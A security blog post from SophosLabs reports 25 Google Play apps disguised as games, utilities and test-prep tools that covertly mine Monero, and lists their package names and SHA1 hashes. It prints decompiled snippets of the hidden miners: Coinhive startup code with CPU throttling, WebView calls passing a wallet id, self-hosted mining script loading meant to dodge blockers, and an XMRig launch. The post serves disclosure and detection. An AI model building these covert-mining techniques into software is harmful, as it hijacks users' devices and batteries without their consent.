Cryptojacking apps return to Google Play Market

CorporateMalwarePostsSmartphonesSophosLabsSophosLabs UncutAndroidBitcoinCoinHivecryptocurrencycryptojackingcyptominerGoogle PlayMoneroSophos MobileXMRXMRig

At least 25 Android apps on the official Google Play store contain code that mines cryptocurrencies in the background.

SophosLabs Uncut

By Pankaj Kohli

Even though the prices of cryptocurrencies have tanked considerably in the past few months, malware authors are still upbeat about the idea of leveraging victims’ devices for mining. In conjunction with our contribution to the Cyber Threat Alliance report on cryptomining and cryptojacking, released last week, we’re publishing this report on undisclosed cryptomining code in mobile apps.

SophosLabs recently discovered 25 apps on Google Play that disguise themselves as games, utilities and educational apps, but under the hood they turn victim’s mobile device into cryptocurrency churning rigs. These apps had been downloaded and installed more than 120,000 times.

Most of the apps were found to have embedded code from Coinhive, a JavaScript implementation to mine Monero. Coinhive is specifically written to crunch numbers using CPUs (as opposed to graphics processors), which makes it a perfect candidate for covert mining on mobile devices.

The miner code, which is only a few lines long, can be easily added into any app that uses a WebView embedded browser. Monero has been the authors’ choice of cryptocurrency for all these apps as it offers sufficient privacy to keep the source, destination, and the amount mined hidden. These apps use CPU throttling to limit CPU usage by mining, and thus avoid the usual pitfalls: Device overheating, high battery drain, and overall device sluggishness – a mistake made by the mobile mining malware Loapi last year.

11 of these 25 apps were preparation apps for standardized tests given in the US, exams such as the ACT, GRE, or SAT, and were published by a single developer account (Gadgetium). These apps contain a HTML page which contains Coinhive-based miner.

function startMiner(n, id) {
 	if(isAlreadyStarted) return;
	var miner = new CoinHive.Anonymous(id, {
		threads: n-1,
		autoThreads: true,
		throttle: 0.5

The apps first enable JavaScript and load the HTML page using a WebView.


The miner is then started using a wallet value (miner_id) retrieved from the resources.

this.mWebView.loadUrl("javascript:startMiner(\"" + this.mNumCores + "\",\"" + this.getString(string.miner_id) + "\")");

While most of the Coinhive based mining apps relied on scripts hosted on, two of these apps – co.lighton and com.mobeleader.spsapp hosted the mining scripts on their own servers (shown below), presumably to thwart firewalls or parental controls/reputation services that might block Coinhive’s domain by default.

	Log.i(this.this$1.this$0.TAG, " STOP ");
	this.this$1.this$0.mFirebaseAnalytics.logEvent("miner_stop", ((Bundle)v8));
else {
	Log.i(this.this$1.this$0.TAG, " START ");
	this.this$1.this$0.mFirebaseAnalytics.logEvent("miner_start", ((Bundle)v8));
this.c = new WebView(this.getApplicationContext());
this.c.setWebChromeClient(new WebChromeClient());
this.c.loadUrl("" + 
               this.a.getString("mobeleader_appHash", "") + 
               "&coin=" + 
               this.a.getString("mobeleader_coin", ""));


One of the discovered apps – de.uwepost.apaintboxforkids was found to using XMRig, an open-source CPU miner that can mine several cryptocurrencies, including Monero.

ProcessBuilder v8 = new ProcessBuilder(new String[]{"./xmrig"});;
v8.environment().put("LD_LIBRARY_PATH", this.privatePath);
v8.redirectErrorStream(); this.accepted = 0; this.process = v8.start();
this.outputHandler = new OutputReaderThread(this, this.process.getInputStream());
Log.i("MiningSvc", "started, threads=" + arg10.threads + ", maxCpu=" + arg10.maxCpu);

Although mining apps have been categorically banned on Google Play, many such miners still continue to be freely available on the marketplace.

SophosLabs notified Google about these mining apps in August. Although some of these apps have been taken down, many of these continue to remain available. These apps are detected by Sophos Mobile Security as Coinhive JavaScript cryptocoin miner and Android XMRig Miner.

Indicators of Cryptomining

Package Name SHA1
com.cakrawalapengetahuan.infogurupendidikan 28335b0feeef216cad3e578c62ed78450fefbf19
com.devmouakkit.mugginsdominoesgame 0f65dac3cc40e888c52f38dc0121990a47cdf773 d758e3e00a002d882ed9993ba9dc1efb4e7746df dc92d18740ae5f802a96e5da72e655f12627c927 00739b32e5edb863e6f029aa171025a7161e5fc6
com.gadgetium.gmat 533ece694ec86d834ddcbd918aa6497741f1ef9b
com.gadgetium.gre af0348a4c975aaa1e0bf0bbc95f9f258f1653250
com.gadgetium.lsat 09807f9f2059da076b681501ba472c625bcb974d
com.gadgetium.psat 0589115a44f8dd52c9c21b92fa2b5b933663601c
com.gadgetium.test.aieee 137098f142b685caf878ae9e034797cee0dc17f9
com.gadgetium.test.aiims 73839664372812a004d65a6592c985fb26bbd7a5
com.gadgetium.test.gate 208f843528e51bc8ca1896042da3fa4a2d9dd847
com.gadgetium.test.stan 0059e145a12a99a63a364c27ead7ed04d7d2dd16 7e80cb4ae5adf85ccca8e251263e1ab44ea51611
com.palpostr.palkar b85b257e1ffd0c48811a53f3b9577669f917af6f
com.rdt.tapbugs de45eee90c954befdd7451c6d611f53ee729af6e
com.rdt.yamaya.dreamspell 299805c00b7fe80667042de671335362ebe2b62f
com.rlite.funnfair d5482461e0c70dd7e2988819a47f8161a5c4d8ad
com.servicehangar.seriestrailer c31720e56233f455b3527c5ddc536c2b9b94516c
com.thanhtuteam.gameviet2048 ffc00c57f1339abe99aa4c8e561accaed2e695ea
de.uwepost.apaintboxforkids c943fa6b495469104d2a46a11f626d65f237a3f3
com.mobeleader.spsapp 86da0dc430247a6fbbcd0fcb9b848deab37e6676
com.solovev.kghelper edaf4166d4d332659af2c7c0252ea0b09800bf2f
com.thothprojects.trancedroid 0c87047219723f4d223d37706e26eabb2efdd839
co.lighton ab0d5b5a1c8db42352cdc8173630099f8628dc5b


1 Comment

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.